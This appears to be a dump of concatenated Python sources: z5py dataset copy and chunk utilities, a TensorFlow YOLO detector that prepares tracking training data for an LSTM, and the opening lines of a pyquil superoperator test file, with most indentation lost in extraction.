def write_single_block(bb):
data_in = ds_in[bb].astype(dtype, copy=False)
if np.sum(data_in) == 0:
return
if fit_to_roi and roi is not None:
bb = tuple(slice(b.start - rr.start, b.stop - rr.start)
for b, rr in zip(bb, roi))
ds_out[bb] = data_in
def write_single_chunk(bb):
chunk_id = tuple(b.start // ch for b, ch in zip(bb, chunks))
chunk_in = ds_in.read_chunk(chunk_id)
if chunk_in is None:
return
# check if this is a varlen chunk
varlen = tuple(chunk_in.shape) != tuple(b.stop - b.start for b in bb)
ds_out.write_chunk(chunk_id, chunk_in.astype(dtype, copy=False), varlen)
write_single = write_single_chunk if copy_chunks else write_single_block
with futures.ThreadPoolExecutor(max_workers=n_threads) as tp:
tasks = [tp.submit(write_single, bb) for bb in blocks]
[t.result() for t in tasks]
# copy attributes
in_attrs = ds_in.attrs
out_attrs = ds_out.attrs
for key, val in in_attrs.items():
out_attrs[key] = val
def copy_dataset(in_path, out_path,
in_path_in_file, out_path_in_file,
n_threads, chunks=None,
block_shape=None, dtype=None,
use_zarr_format=None, roi=None,
fit_to_roi=False, **new_compression):
""" Copy dataset, optionally change metadata.
The input dataset will be copied to the output dataset chunk by chunk.
Allows to change chunks, datatype, file format and compression.
Can also just copy a roi.
Args:
in_path (str): path to the input file.
out_path (str): path to the output file.
in_path_in_file (str): name of input dataset.
out_path_in_file (str): name of output dataset.
n_threads (int): number of threads used for copying.
chunks (tuple): chunks of the output dataset.
By default same as input dataset's chunks. (default: None)
block_shape (tuple): block shape used for copying. Must be a multiple
of ``chunks``, which are used by default (default: None)
dtype (str): datatype of the output dataset, default does not change datatype (default: None).
use_zarr_format (bool): file format of the output file,
default does not change format (default: None).
roi (tuple[slice]): region of interest that will be copied. (default: None)
fit_to_roi (bool): if given a roi, whether to set the shape of
the output dataset to the roi's shape
and align chunks with the roi's origin. (default: False)
**new_compression: compression library and options for output dataset. If not given,
the same compression as in the input is used.
"""
f_in = File(in_path)
# check if the file format was specified
# if not, keep the format of the input file
# otherwise set the file format
is_zarr = f_in.is_zarr if use_zarr_format is None else use_zarr_format
f_out = File(out_path, use_zarr_format=is_zarr)
copy_dataset_impl(f_in, f_out, in_path_in_file, out_path_in_file,
n_threads, chunks=chunks, block_shape=block_shape,
dtype=dtype, roi=roi, fit_to_roi=fit_to_roi,
**new_compression)
def copy_group(in_path, out_path, in_path_in_file, out_path_in_file, n_threads):
""" Copy group recursively.
Copy the group recursively, using copy_dataset. Metadata of datasets that
are copied cannot be changed and rois cannot be applied.
Args:
in_path (str): path to the input file.
out_path (str): path to the output file.
in_path_in_file (str): name of input group.
out_path_in_file (str): name of output group.
n_threads (int): number of threads used to copy datasets.
"""
f_in = File(in_path)
f_out = File(out_path)
def copy_attrs(gin, gout):
in_attrs = gin.attrs
out_attrs = gout.attrs
for key, val in in_attrs.items():
out_attrs[key] = val
g_in = f_in[in_path_in_file]
g_out = f_out.require_group(out_path_in_file)
copy_attrs(g_in, g_out)
def copy_object(name, obj):
abs_in_key = os.path.join(in_path_in_file, name)
abs_out_key = os.path.join(out_path_in_file, name)
if isinstance(obj, Dataset):
copy_dataset(in_path, out_path,
abs_in_key, abs_out_key, n_threads)
else:
g = f_out.require_group(abs_out_key)
copy_attrs(obj, g)
g_in.visititems(copy_object)
class Timer:
def __init__(self):
self.start_time = None
self.stop_time = None
@property
def elapsed(self):
try:
return (self.stop_time - self.start_time).total_seconds()
        except TypeError as e:
            if "'NoneType'" in str(e):
                raise RuntimeError("{} either not started, or not stopped".format(self))
            raise
def start(self):
self.start_time = datetime.utcnow()
def stop(self):
self.stop_time = datetime.utcnow()
return self.elapsed
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
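# Typical use of Timer (illustrative sketch):
#     with Timer() as t:
#         do_work()
#     print(t.elapsed)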
def fetch_test_data_stent():
from imageio import volread
data_i16 = volread('imageio:stent.npz')
return (data_i16 / data_i16.max() * 255).astype(np.uint8)
def fetch_test_data():
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
try:
from io import BytesIO as Buffer
except ImportError:
from StringIO import StringIO as Buffer
import zipfile
from imageio import volread
im_url = "https://imagej.nih.gov/ij/images/t1-head-raw.zip"
with closing(urlopen(im_url)) as response:
if response.status != 200:
raise RuntimeError("Test data could not be found at {}, status code {}".format(
im_url, response.status
))
zip_buffer = Buffer(response.read())
with zipfile.ZipFile(zip_buffer) as zf:
tif_buffer = Buffer(zf.read('JeffT1_le.tif'))
return np.asarray(volread(tif_buffer, format='tif'), dtype=np.uint8)
def remove_trivial_chunks(dataset, n_threads,
remove_specific_value=None):
""" Remove chunks that only contain a single value.
The input dataset will be copied to the output dataset chunk by chunk.
Allows to change datatype, file format and compression as well.
Args:
dataset (z5py.Dataset)
n_threads (int): number of threads
remove_specific_value (int or float): only remove chunks that contain (only) this specific value (default: None)
"""
dtype = dataset.dtype
function = getattr(_z5py, 'remove_trivial_chunks_%s' % dtype)
remove_specific = remove_specific_value is not None
value = remove_specific_value if remove_specific else 0
function(dataset._impl, n_threads, remove_specific, value)
def remove_dataset(dataset, n_threads):
    """ Remove a dataset using multiple threads.
"""
_z5py.remove_dataset(dataset._impl, n_threads)
def remove_chunk(dataset, chunk_id):
""" Remove a chunk
"""
dataset._impl.remove_chunk(dataset._impl, chunk_id)
def remove_chunks(dataset, bounding_box):
""" Remove all chunks overlapping the bounding box
"""
shape = dataset.shape
chunks = dataset.chunks
blocks = blocking(shape, chunks, roi=bounding_box)
for block in blocks:
chunk_id = tuple(b.start // ch for b, ch in zip(block, chunks))
remove_chunk(dataset, chunk_id)
def unique(dataset, n_threads, return_counts=False):
""" Find unique values in dataset.
Args:
dataset (z5py.Dataset)
n_threads (int): number of threads
return_counts (bool): return counts of unique values (default: False)
"""
dtype = dataset.dtype
if return_counts:
function = getattr(_z5py, 'unique_with_counts_%s' % dtype)
else:
function = getattr(_z5py, 'unique_%s' % dtype)
return function(dataset._impl, n_threads)
|
17246
|
import os
import numpy as np
import tensorflow as tf
import cv2
import time
import sys
import pickle
import ROLO_utils as util
class YOLO_TF:
fromfile = None
tofile_img = 'test/output.jpg'
tofile_txt = 'test/output.txt'
imshow = True
filewrite_img = False
filewrite_txt = False
disp_console = True
weights_file = 'weights/YOLO_small.ckpt'
alpha = 0.1
threshold = 0.08
iou_threshold = 0.5
num_class = 20
num_box = 2
grid_size = 7
classes = ["aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train","tvmonitor"]
w_img, h_img = [352, 240]
num_feat = 4096
num_predict = 6 # final output of LSTM 6 loc parameters
num_heatmap = 1024
def __init__(self,argvs = []):
self.argv_parser(argvs)
self.build_networks()
if self.fromfile is not None: self.detect_from_file(self.fromfile)
def argv_parser(self,argvs):
for i in range(1,len(argvs),2):
if argvs[i] == '-fromfile' : self.fromfile = argvs[i+1]
if argvs[i] == '-tofile_img' : self.tofile_img = argvs[i+1] ; self.filewrite_img = True
if argvs[i] == '-tofile_txt' : self.tofile_txt = argvs[i+1] ; self.filewrite_txt = True
if argvs[i] == '-imshow' :
if argvs[i+1] == '1' :self.imshow = True
else : self.imshow = False
if argvs[i] == '-disp_console' :
if argvs[i+1] == '1' :self.disp_console = True
else : self.disp_console = False
def build_networks(self):
        if self.disp_console: print("Building YOLO_small graph...")
self.x = tf.placeholder('float32',[None,448,448,3])
self.conv_1 = self.conv_layer(1,self.x,64,7,2)
self.pool_2 = self.pooling_layer(2,self.conv_1,2,2)
self.conv_3 = self.conv_layer(3,self.pool_2,192,3,1)
self.pool_4 = self.pooling_layer(4,self.conv_3,2,2)
self.conv_5 = self.conv_layer(5,self.pool_4,128,1,1)
self.conv_6 = self.conv_layer(6,self.conv_5,256,3,1)
self.conv_7 = self.conv_layer(7,self.conv_6,256,1,1)
self.conv_8 = self.conv_layer(8,self.conv_7,512,3,1)
self.pool_9 = self.pooling_layer(9,self.conv_8,2,2)
self.conv_10 = self.conv_layer(10,self.pool_9,256,1,1)
self.conv_11 = self.conv_layer(11,self.conv_10,512,3,1)
self.conv_12 = self.conv_layer(12,self.conv_11,256,1,1)
self.conv_13 = self.conv_layer(13,self.conv_12,512,3,1)
self.conv_14 = self.conv_layer(14,self.conv_13,256,1,1)
self.conv_15 = self.conv_layer(15,self.conv_14,512,3,1)
self.conv_16 = self.conv_layer(16,self.conv_15,256,1,1)
self.conv_17 = self.conv_layer(17,self.conv_16,512,3,1)
self.conv_18 = self.conv_layer(18,self.conv_17,512,1,1)
self.conv_19 = self.conv_layer(19,self.conv_18,1024,3,1)
self.pool_20 = self.pooling_layer(20,self.conv_19,2,2)
self.conv_21 = self.conv_layer(21,self.pool_20,512,1,1)
self.conv_22 = self.conv_layer(22,self.conv_21,1024,3,1)
self.conv_23 = self.conv_layer(23,self.conv_22,512,1,1)
self.conv_24 = self.conv_layer(24,self.conv_23,1024,3,1)
self.conv_25 = self.conv_layer(25,self.conv_24,1024,3,1)
self.conv_26 = self.conv_layer(26,self.conv_25,1024,3,2)
self.conv_27 = self.conv_layer(27,self.conv_26,1024,3,1)
self.conv_28 = self.conv_layer(28,self.conv_27,1024,3,1)
self.fc_29 = self.fc_layer(29,self.conv_28,512,flat=True,linear=False)
self.fc_30 = self.fc_layer(30,self.fc_29,4096,flat=False,linear=False)
#skip dropout_31
self.fc_32 = self.fc_layer(32,self.fc_30,1470,flat=False,linear=True)
self.sess = tf.Session()
self.sess.run(tf.initialize_all_variables())
self.saver = tf.train.Saver()
self.saver.restore(self.sess,self.weights_file)
        if self.disp_console: print("Loading complete!" + '\n')
def conv_layer(self,idx,inputs,filters,size,stride):
channels = inputs.get_shape()[3]
weight = tf.Variable(tf.truncated_normal([size,size,int(channels),filters], stddev=0.1))
biases = tf.Variable(tf.constant(0.1, shape=[filters]))
pad_size = size//2
pad_mat = np.array([[0,0],[pad_size,pad_size],[pad_size,pad_size],[0,0]])
inputs_pad = tf.pad(inputs,pad_mat)
conv = tf.nn.conv2d(inputs_pad, weight, strides=[1, stride, stride, 1], padding='VALID',name=str(idx)+'_conv')
conv_biased = tf.add(conv,biases,name=str(idx)+'_conv_biased')
        if self.disp_console: print(' Layer %d : Type = Conv, Size = %d * %d, Stride = %d, Filters = %d, Input channels = %d' % (idx, size, size, stride, filters, int(channels)))
return tf.maximum(self.alpha*conv_biased,conv_biased,name=str(idx)+'_leaky_relu')
def pooling_layer(self,idx,inputs,size,stride):
        if self.disp_console: print(' Layer %d : Type = Pool, Size = %d * %d, Stride = %d' % (idx, size, size, stride))
return tf.nn.max_pool(inputs, ksize=[1, size, size, 1],strides=[1, stride, stride, 1], padding='SAME',name=str(idx)+'_pool')
def fc_layer(self,idx,inputs,hiddens,flat = False,linear = False):
input_shape = inputs.get_shape().as_list()
if flat:
dim = input_shape[1]*input_shape[2]*input_shape[3]
inputs_transposed = tf.transpose(inputs,(0,3,1,2))
inputs_processed = tf.reshape(inputs_transposed, [-1,dim])
else:
dim = input_shape[1]
inputs_processed = inputs
weight = tf.Variable(tf.truncated_normal([dim,hiddens], stddev=0.1))
biases = tf.Variable(tf.constant(0.1, shape=[hiddens]))
        if self.disp_console: print(' Layer %d : Type = Full, Hidden = %d, Input dimension = %d, Flat = %d, Activation = %d' % (idx, hiddens, int(dim), int(flat), 1 - int(linear)))
if linear : return tf.add(tf.matmul(inputs_processed,weight),biases,name=str(idx)+'_fc')
ip = tf.add(tf.matmul(inputs_processed,weight),biases)
return tf.maximum(self.alpha*ip,ip,name=str(idx)+'_fc')
def detect_from_cvmat(self,img):
s = time.time()
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x: inputs}
net_output = self.sess.run(self.fc_32,feed_dict=in_dict)
self.result = self.interpret_output(net_output[0])
self.show_results(img,self.result)
strtime = str(time.time()-s)
        if self.disp_console: print('Elapsed time : ' + strtime + ' secs' + '\n')
def detect_from_file(self,filename):
        if self.disp_console: print('Detect from ' + filename)
img = cv2.imread(filename)
#img = misc.imread(filename)
self.detect_from_cvmat(img)
def detect_from_crop_sample(self):
self.w_img = 640
self.h_img = 420
f = np.array(open('person_crop.txt','r').readlines(),dtype='float32')
inputs = np.zeros((1,448,448,3),dtype='float32')
for c in range(3):
for y in range(448):
for x in range(448):
inputs[0,y,x,c] = f[c*448*448+y*448+x]
in_dict = {self.x: inputs}
net_output = self.sess.run(self.fc_32,feed_dict=in_dict)
self.boxes, self.probs = self.interpret_output(net_output[0])
img = cv2.imread('person.jpg')
self.show_results(self.boxes,img)
def interpret_output(self,output):
probs = np.zeros((7,7,2,20))
class_probs = np.reshape(output[0:980],(7,7,20))
scales = np.reshape(output[980:1078],(7,7,2))
boxes = np.reshape(output[1078:],(7,7,2,4))
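        # The 1470-d fc_32 output decomposes as 7*7*20 = 980 class probabilities,
        # 7*7*2 = 98 box confidences ("scales") and 7*7*2*4 = 392 box coordinates.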
offset = np.transpose(np.reshape(np.array([np.arange(7)]*14),(2,7,7)),(1,2,0))
boxes[:,:,:,0] += offset
boxes[:,:,:,1] += np.transpose(offset,(1,0,2))
boxes[:,:,:,0:2] = boxes[:,:,:,0:2] / 7.0
boxes[:,:,:,2] = np.multiply(boxes[:,:,:,2],boxes[:,:,:,2])
boxes[:,:,:,3] = np.multiply(boxes[:,:,:,3],boxes[:,:,:,3])
boxes[:,:,:,0] *= self.w_img
boxes[:,:,:,1] *= self.h_img
boxes[:,:,:,2] *= self.w_img
boxes[:,:,:,3] *= self.h_img
for i in range(2):
for j in range(20):
probs[:,:,i,j] = np.multiply(class_probs[:,:,j],scales[:,:,i])
filter_mat_probs = np.array(probs>=self.threshold,dtype='bool')
filter_mat_boxes = np.nonzero(filter_mat_probs)
boxes_filtered = boxes[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
probs_filtered = probs[filter_mat_probs]
classes_num_filtered = np.argmax(filter_mat_probs,axis=3)[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
argsort = np.array(np.argsort(probs_filtered))[::-1]
boxes_filtered = boxes_filtered[argsort]
probs_filtered = probs_filtered[argsort]
classes_num_filtered = classes_num_filtered[argsort]
for i in range(len(boxes_filtered)):
if probs_filtered[i] == 0 : continue
for j in range(i+1,len(boxes_filtered)):
if self.iou(boxes_filtered[i],boxes_filtered[j]) > self.iou_threshold :
probs_filtered[j] = 0.0
filter_iou = np.array(probs_filtered>0.0,dtype='bool')
boxes_filtered = boxes_filtered[filter_iou]
probs_filtered = probs_filtered[filter_iou]
classes_num_filtered = classes_num_filtered[filter_iou]
result = []
for i in range(len(boxes_filtered)):
result.append([self.classes[classes_num_filtered[i]],boxes_filtered[i][0],boxes_filtered[i][1],boxes_filtered[i][2],boxes_filtered[i][3],probs_filtered[i]])
return result
def show_results(self,img,results):
img_cp = img.copy()
if self.filewrite_txt :
ftxt = open(self.tofile_txt,'w')
for i in range(len(results)):
x = int(results[i][1])
y = int(results[i][2])
w = int(results[i][3])//2
h = int(results[i][4])//2
            if self.disp_console: print(' class : ' + results[i][0] + ' , [x,y,w,h]=[' + str(x) + ',' + str(y) + ',' + str(int(results[i][3])) + ',' + str(int(results[i][4])) + '], Confidence = ' + str(results[i][5]))
if self.filewrite_img or self.imshow:
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp,results[i][0] + ' : %.2f' % results[i][5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
if self.filewrite_txt :
ftxt.write(results[i][0] + ',' + str(x) + ',' + str(y) + ',' + str(w) + ',' + str(h)+',' + str(results[i][5]) + '\n')
if self.filewrite_img :
            if self.disp_console: print(' image file written : ' + self.tofile_img)
cv2.imwrite(self.tofile_img,img_cp)
if self.imshow :
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(0)
if self.filewrite_txt :
            if self.disp_console: print(' txt file written : ' + self.tofile_txt)
ftxt.close()
def iou(self,box1,box2):
tb = min(box1[0]+0.5*box1[2],box2[0]+0.5*box2[2])-max(box1[0]-0.5*box1[2],box2[0]-0.5*box2[2])
lr = min(box1[1]+0.5*box1[3],box2[1]+0.5*box2[3])-max(box1[1]-0.5*box1[3],box2[1]-0.5*box2[3])
if tb < 0 or lr < 0 : intersection = 0
else : intersection = tb*lr
return intersection / (box1[2]*box1[3] + box2[2]*box2[3] - intersection)
# my addition
def createFolder(self, path):
if not os.path.exists(path):
os.makedirs(path)
def debug_location(self, img, location):
img_cp = img.copy()
x = int(location[1])
y = int(location[2])
w = int(location[3])//2
h = int(location[4])//2
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp, str(location[0]) + ' : %.2f' % location[5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(1)
def debug_locations(self, img, locations):
img_cp = img.copy()
for location in locations:
x = int(location[1])
y = int(location[2])
w = int(location[3])//2
h = int(location[4])//2
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp, str(location[0]) + ' : %.2f' % location[5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(1)
def debug_gt_location(self, img, location):
img_cp = img.copy()
x = int(location[0])
y = int(location[1])
w = int(location[2])
h = int(location[3])
cv2.rectangle(img_cp,(x,y),(x+w,y+h),(0,255,0),2)
cv2.imshow('gt',img_cp)
cv2.waitKey(1)
def file_to_img(self, filepath):
img = cv2.imread(filepath)
return img
    def file_to_video(self, filepath):
        try:
            video = cv2.VideoCapture(filepath)
        except IOError:
            print('cannot open video file: ' + filepath)
            video = None
        return video
def iou(self,box1,box2):
tb = min(box1[0]+0.5*box1[2],box2[0]+0.5*box2[2])-max(box1[0]-0.5*box1[2],box2[0]-0.5*box2[2])
lr = min(box1[1]+0.5*box1[3],box2[1]+0.5*box2[3])-max(box1[1]-0.5*box1[3],box2[1]-0.5*box2[3])
if tb < 0 or lr < 0 : intersection = 0
else : intersection = tb*lr
return intersection / (box1[2]*box1[3] + box2[2]*box2[3] - intersection)
def find_iou_cost(self, pred_locs, gts):
# for each element in the batch, find its iou. output a list of ious.
cost = 0
batch_size= len(pred_locs)
assert (len(gts)== batch_size)
        print("batch_size: ", batch_size)
ious = []
for i in range(batch_size):
pred_loc = pred_locs[i]
gt = gts[i]
iou_ = self.iou(pred_loc, gt)
            ious.append(iou_)
return ious
def load_folder(self, path):
paths = [os.path.join(path,fn) for fn in next(os.walk(path))[2]]
#return paths
return sorted(paths)
def load_dataset_gt(self, gt_file):
txtfile = open(gt_file, "r")
lines = txtfile.read().split('\n') #'\r\n'
return lines
def find_gt_location(self, lines, id):
line = lines[id]
elems = line.split('\t') # for gt type 2
if len(elems) < 4:
elems = line.split(',') #for gt type 1
x1 = elems[0]
y1 = elems[1]
w = elems[2]
h = elems[3]
gt_location = [int(x1), int(y1), int(w), int(h)]
return gt_location
def find_best_location(self, locations, gt_location):
# locations (class, x, y, w, h, prob); (x, y) is the middle pt of the rect
# gt_location (x1, y1, w, h)
x1 = gt_location[0]
y1 = gt_location[1]
w = gt_location[2]
h = gt_location[3]
gt_location_revised= [x1 + w/2, y1 + h/2, w, h]
max_ious= 0
for id, location in enumerate(locations):
location_revised = location[1:5]
print("location: ", location_revised)
print("gt_location: ", gt_location_revised)
ious = self.iou(location_revised, gt_location_revised)
if ious >= max_ious:
max_ious = ious
index = id
print("Max IOU: " + str(max_ious))
if max_ious != 0:
best_location = locations[index]
class_index = self.classes.index(best_location[0])
best_location[0]= class_index
return best_location
else: # it means the detection failed, no intersection with the ground truth
return [0, 0, 0, 0, 0, 0]
def save_yolo_output(self, out_fold, yolo_output, filename):
name_no_ext= os.path.splitext(filename)[0]
output_name= name_no_ext
path = os.path.join(out_fold, output_name)
np.save(path, yolo_output)
def location_from_0_to_1(self, wid, ht, location):
location[1] /= wid
location[2] /= ht
location[3] /= wid
location[4] /= ht
return location
def gt_location_from_0_to_1(self, wid, ht, location):
wid *= 1.0
ht *= 1.0
location[0] /= wid
location[1] /= ht
location[2] /= wid
location[3] /= ht
return location
def locations_normal(self, wid, ht, locations):
wid *= 1.0
ht *= 1.0
locations[1] *= wid
locations[2] *= ht
locations[3] *= wid
locations[4] *= ht
return locations
def cal_yolo_loss(self, location, gt_location):
# Translate yolo's box mid-point (x0, y0) to top-left point (x1, y1), in order to compare with gt
location[0] = location[0] - location[2]/2
location[1] = location[1] - location[3]/2
loss= sum([(location[i] - gt_location[i])**2 for i in range(4)]) * 100 / 4
return loss
def cal_yolo_IOU(self, location, gt_location):
# Translate yolo's box mid-point (x0, y0) to top-left point (x1, y1), in order to compare with gt
location[0] = location[0] - location[2]/2
location[1] = location[1] - location[3]/2
loss = self.iou(location, gt_location)
return loss
def prepare_training_data(self, img_fold, gt_file, out_fold): #[or]prepare_training_data(self, list_file, gt_file, out_fold):
        ''' Pass each frame through YOLO, take the fc_30 activations as features and the
        best-matching detection from the interpreted fc_32 output as the location.
        Save the features and locations into files for training the LSTM. '''
# Reshape the input image
paths= self.load_folder(img_fold)
gt_locations= self.load_dataset_gt(gt_file)
avg_loss = 0
total= 0
total_time= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
start_time = time.time()
feature= self.sess.run(self.fc_30,feed_dict=in_dict)
cycle_time = time.time() - start_time
print('cycle time= ', cycle_time)
total_time += cycle_time
output = self.sess.run(self.fc_32,feed_dict=in_dict) # make sure it does not run conv layers twice
locations = self.interpret_output(output[0])
gt_location = self.find_gt_location(gt_locations, id)
location = self.find_best_location(locations, gt_location) # find the ROI that has the maximum IOU with the ground truth
self.debug_location(img, location)
self.debug_gt_location(img, gt_location)
# change location into [0, 1]
loss= self.cal_yolo_IOU(location[1:5], gt_location)
location = self.location_from_0_to_1(self.w_img, self.h_img, location)
avg_loss += loss
total += 1
print("loss: ", loss)
yolo_output= np.concatenate(
( np.reshape(feature, [-1, self.num_feat]),
np.reshape(location, [-1, self.num_predict]) ),
axis = 1)
self.save_yolo_output(out_fold, yolo_output, filename)
avg_loss = avg_loss/total
print("YOLO avg_loss: ", avg_loss)
        print("Time Spent on Tracking: " + str(total_time))
        print("fps: " + str(id / total_time))
return
def loc_to_coordinates(self, loc):
loc = [i * 32 for i in loc]
x1= int(loc[0]- loc[2]/2)
y1= int(loc[1]- loc[3]/2)
x2= int(loc[0]+ loc[2]/2)
y2= int(loc[1]+ loc[3]/2)
return [x1, y1, x2, y2]
def coordinates_to_heatmap_vec(self, coord):
heatmap_vec = np.zeros(1024)
print(coord)
[classnum, x1, y1, x2, y2, prob] = coord
[x1, y1, x2, y2]= self.loc_to_coordinates([x1, y1, x2, y2])
for y in range(y1, y2):
for x in range(x1, x2):
index = y*32 + x
heatmap_vec[index] = 1.0
return heatmap_vec
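    # The 1024-d heatmap above is a flattened 32x32 grid: normalized box coordinates in [0, 1]
    # are scaled by 32 (loc_to_coordinates) and every grid cell covered by the box is set to 1.0.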
def prepare_training_data_heatmap(self, img_fold, gt_file, out_fold): #[or]prepare_training_data(self, list_file, gt_file, out_fold):
        ''' Pass each frame through YOLO, take the fc_30 activations as features and the
        best-matching detection from the interpreted fc_32 output as the location, converted
        to a 32x32 heatmap. Save the features and heatmaps into files for training the LSTM. '''
# Reshape the input image
paths= self.load_folder(img_fold)
gt_locations= self.load_dataset_gt(gt_file)
avg_loss = 0
total= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
feature= self.sess.run(self.fc_30,feed_dict=in_dict)
output = self.sess.run(self.fc_32,feed_dict=in_dict) # make sure it does not run conv layers twice
locations = self.interpret_output(output[0])
gt_location = self.find_gt_location(gt_locations, id)
location = self.find_best_location(locations, gt_location) # find the ROI that has the maximum IOU with the ground truth
self.debug_location(img, location)
self.debug_gt_location(img, gt_location)
# change location into [0, 1]
loss= self.cal_yolo_IOU(location[1:5], gt_location)
location = self.location_from_0_to_1(self.w_img, self.h_img, location)
heatmap_vec= self.coordinates_to_heatmap_vec(location)
avg_loss += loss
total += 1
print("loss: ", loss)
yolo_output= np.concatenate(
( np.reshape(feature, [-1, self.num_feat]),
np.reshape(heatmap_vec, [-1, self.num_heatmap]) ),
axis = 1)
self.save_yolo_output(out_fold, yolo_output, filename)
avg_loss = avg_loss/total
print("YOLO avg_loss: ", avg_loss)
return
def prepare_training_data_multiTarget(self, img_fold, out_fold):
        ''' Pass each frame through YOLO, take the fc_30 activations as features and all
        interpreted fc_32 detections as locations.
        Save the features and locations into files for training the LSTM. '''
# Reshape the input image
print(img_fold)
paths= self.load_folder(img_fold)
avg_loss = 0
total= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
feature= self.sess.run(self.fc_30,feed_dict=in_dict)
output = self.sess.run(self.fc_32,feed_dict=in_dict) # make sure it does not run conv layers twice
locations = self.interpret_output(output[0])
self.debug_locations(img, locations)
# change location into [0, 1]
for i in range(0, len(locations)):
class_index = self.classes.index(locations[i][0])
locations[i][0] = class_index
locations[i] = self.location_from_0_to_1(self.w_img, self.h_img, locations[i])
if len(locations)== 1:
print('len(locations)= 1\n')
yolo_output = [[np.reshape(feature, [-1, self.num_feat])], [np.reshape(locations, [-1, self.num_predict]), [0,0,0,0,0,0]]]
else:
yolo_output = [[np.reshape(feature, [-1, self.num_feat])], [np.reshape(locations, [-1, self.num_predict])]]
self.save_yolo_output(out_fold, yolo_output, filename)
return
'''----------------------------------------main-----------------------------------------------------'''
def main(argvs):
yolo = YOLO_TF(argvs)
test = 4
heatmap= False#True
'''
VOT30
0:'Human2'
1:'Human9'
2:'Gym'
3:'Human8'
4:'Skater'
5:'Suv'
6:'BlurBody'
7:'CarScale'
8:'Dancer2'
9:'BlurCar1'
10:'Dog'
11:'Jump'
12:'Singer2'
13:'Woman'
14:'David3'
15:'Dancer'
16:'Human7'
17:'Bird1'
18:'Car4'
19:'CarDark'
20:'Couple'
21:'Diving'
22:'Human3'
23:'Skating1'
24:'Human6'
25:'Singer1'
26:'Skater2'
27:'Walking2'
28:'BlurCar3'
29:'Girl2'
MOT2016
30:'MOT16-02'
31:'MOT16-04'
32:'MOT16-05'
33:'MOT16-09'
34:'MOT16-10'
35:'MOT16-11'
36:'MOT16-13'
37:'MOT16-01'
38:'MOT16-03'
39:'MOT16-06'
40:'MOT16-07'
41:'MOT16-08'
42:'MOT16-12'
43:'MOT16-14'
'''
[yolo.w_img, yolo.h_img, sequence_name, dummy_1, dummy_2]= util.choose_video_sequence(test)
if (test >= 0 and test <= 29) or (test >= 90):
root_folder = 'benchmark/DATA'
img_fold = os.path.join(root_folder, sequence_name, 'img/')
elif test<= 36:
root_folder = 'benchmark/MOT/MOT2016/train'
img_fold = os.path.join(root_folder, sequence_name, 'img1/')
elif test<= 43:
root_folder = 'benchmark/MOT/MOT2016/test'
img_fold = os.path.join(root_folder, sequence_name, 'img1/')
gt_file = os.path.join(root_folder, sequence_name, 'groundtruth_rect.txt')
out_fold = os.path.join(root_folder, sequence_name, 'yolo_out/')
heat_fold = os.path.join(root_folder, sequence_name, 'yolo_heat/')
yolo.createFolder(out_fold)
yolo.createFolder(heat_fold)
if heatmap is True:
yolo.prepare_training_data_heatmap(img_fold, gt_file, heat_fold)
else:
if (test >= 0 and test <= 29) or (test >= 90):
yolo.prepare_training_data(img_fold,gt_file,out_fold)
else:
yolo.prepare_training_data_multiTarget(img_fold,out_fold)
if __name__=='__main__':
main(sys.argv)
|
17258
|
import numpy as np
from pyquil.gate_matrices import X, Y, Z, H
from forest.benchmarking.operator_tools.superoperator_transformations import *
# Test philosophy:
# Using the by-hand calculations found in the docs, we check conversions of
# one-qubit channels with one Kraus operator (Hadamard) and with two Kraus
# operators (the amplitude damping channel). Additionally, we check a few
